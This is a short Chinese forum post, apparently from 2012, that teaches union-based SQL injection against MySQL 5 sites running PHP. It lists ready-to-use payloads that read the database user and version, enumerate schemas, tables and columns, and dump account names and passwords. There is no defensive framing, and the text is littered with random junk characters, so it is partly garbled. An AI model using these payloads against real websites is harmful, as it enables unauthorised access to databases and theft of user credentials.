" P2 Z* ?: P) G. \7 _: y/ U. [教程内容:Mysql 5+php 注入2 ~ A/ ~/ G) D" u' `9 ?7 V
" T- H. Q4 y" s) B# b, q; g
" ` \: V; k2 n1 o" |6 a8 {3 N; f9 S6 S, ]7 k# q# L. u3 `" D
一.查看MYSQL基本信息(库名,版本,用户)/ W! K- A; [- I8 q; Q
. f+ \. ]% C/ @7 k e6 d$ E3 Aand 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8/*
% s0 {8 R/ G9 [# L
2 E- T) k* t6 M5 }% B, T3 I二.查数据库7 H- P9 r0 c' w7 x% p: A
) U* ~7 y0 c( p# d3 @5 C
and 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8 from information_schema.SCHEMATA limit 1,1/*
* m j7 S7 d! y, s1 olimit 从0开始递增,查询到3时浏览器返回错误,说明存在2个库。
$ _1 _; H- e0 \+ Q8 z, B: O: U4 \; Z+ x6 y0 u
三.暴表2 t- t/ ?- ]8 s5 ^
6 H( i% d0 o# l) ^% i7 b( }and 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8 from information_schema.TABLES where TABLE_SCHEMA =库的16进制编码 limit 1,1/*
; v5 _; t! _2 }3 W0 \) @/ F) e9 T( ~( J8 o, q' z" ~
limit 从0开始递增,查询到14时浏览器返回错误,说明此库存在13个表。
& T2 Y& m R/ g7 i0 m" I
/ [$ c# W( H& e& }0 B: x四.暴字段
8 _; C/ ?5 T/ e* a2 {& i; `6 i
; U! c# t) i2 g. Band 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7,8from information_schema.COLUMNS where TABLE_NAME=表的16进制编码 limit 1,1/*5 }8 Z; h' [8 `5 v+ }% R, y: V4 ]2 G
1 K2 U3 t, Y2 D* O8 ]8 Rlimit 从0开始递增,查询到时浏览器返回错误,说明此表存在N-1个列。
3 N* z i* D& N7 Z% B
2 e4 s$ S' t: j( e2 F. w& n五.暴数据
1 l% H# _4 w0 k7 O ?- C1 E$ Y$ D. d$ w
and 1=2 union select 1,2,3,name,5,password,7,8 from web.ad_user/* P. o5 E0 B2 ~
2 J, H' ]* L; l: {: E3 \
4 a: G/ G9 U {
这里直接暴明文的密码,大多时候我们遇到的是MD5加密之后的密文。0 t5 N3 e" ?# }: ^
|
发表于 2012-9-13 16:27:53
收藏
支持
反对